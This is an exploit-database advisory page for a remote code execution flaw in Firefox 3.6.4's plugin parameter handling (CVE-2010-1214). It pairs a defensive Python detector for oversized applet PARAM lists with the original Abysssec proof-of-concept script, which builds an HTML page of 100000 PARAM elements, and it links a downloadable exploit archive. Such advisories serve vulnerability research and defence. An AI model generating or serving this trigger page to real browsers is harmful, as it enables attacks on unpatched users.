Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution - exploit.company
Vendor: Firefox
By: Unknown
CVSS: 9 (CRITICAL)
CWE: Remote Code Execution
Product Name: Firefox
Affected Version From: Firefox 3.6.4
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2010-1214
CPE: a:mozilla:firefox:3.6.4
Other Scripts:
Platforms Tested:
2010

Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution

This exploit allows remote attackers to execute arbitrary code on a system running Firefox 3.6.4 by exploiting a vulnerability in Firefox's plugin parameter handling (EnsureCachedAttrParamArrays).

Mitigation:

Upgrade to a version of Firefox that is not affected by this vulnerability.
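
Where affected browsers cannot be upgraded immediately, HTML can be screened for the pattern the proof-of-concept on this page produces: 100000 PARAM elements inside a single applet element. The Python below is an added example, not part of the original advisory or the Abysssec script; the threshold of 1000 and the names ParamCounter and suspicious_plugin_elements are assumptions of this example, and the sample pages are constructed.

```python
from html.parser import HTMLParser

PLUGIN_TAGS = {"applet", "object"}  # elements that carry <param> children
MAX_PARAMS = 1000                   # assumed threshold, tune to your own traffic


class ParamCounter(HTMLParser):
    """Count the <param> tags seen inside each <applet>/<object> element."""

    def __init__(self):
        super().__init__()
        self._open = []     # stack of [tag, start_line, param_count]
        self.elements = []  # finished (tag, start_line, param_count) records

    def handle_starttag(self, tag, attrs):
        if tag in PLUGIN_TAGS:
            self._open.append([tag, self.getpos()[0], 0])
        elif tag == "param" and self._open:
            self._open[-1][2] += 1  # credit the innermost open plugin element

    def handle_endtag(self, tag):
        # Close the innermost matching element, plus anything left open inside it.
        for i in range(len(self._open) - 1, -1, -1):
            if self._open[i][0] == tag:
                self.elements.extend(tuple(e) for e in self._open[i:])
                del self._open[i:]
                break

    def close(self):
        super().close()
        # An unterminated <applet> still reaches the browser, so report it too.
        self.elements.extend(tuple(e) for e in self._open)
        self._open.clear()


def suspicious_plugin_elements(html, max_params=MAX_PARAMS):
    """Return (tag, line, param_count) for elements above the threshold."""
    parser = ParamCounter()
    parser.feed(html)
    parser.close()
    return [e for e in parser.elements if e[2] > max_params]


# Constructed sample pages (not captured traffic).
BENIGN = "<html><body>\n<object data='a.swf'><param name='q' value='1'></object>\n</body></html>"
FLOODED = "<html><body>\n<APPLET code='Demo.class'>\n" + "<PARAM name='k' value='v'>\n" * 5000 + "</body></html>"

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("flooded", FLOODED)):
        print(name, suspicious_plugin_elements(page))
```

The same function can run in a proxy or mail-gateway content filter; tag names are matched case-insensitively because the parser lowercases them.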

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34358.zip (moaub-17-exploit.zip)
'''
'''
  Title              :  Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
  Version            :  Firefox 3.6.4
  Analysis           :  http://www.abysssec.com
  Vendor             :  http://www.mozilla.com
  Impact             :  Critical
  Contact            :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter            :  @abysssec
  CVE                :  CVE-2010-1214
  
'''

import sys

myStyle = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>page demonstration</title>
<link rel="stylesheet" type="text/css" href="style2.css" />


</head>
<body id='msg'>


    <applet code = 'appletComponentArch.DynamicTreeApplet'   archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >

"""
# Append 100000 identical PARAM elements inside the <applet> element.
for i in range(100000):
    myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n"

myStyle = myStyle + """
	</applet>

</body>
</html>
"""
# Write the generated page to Abysssec.html.
with open("Abysssec.html", "w") as cssFile:
    cssFile.write(myStyle)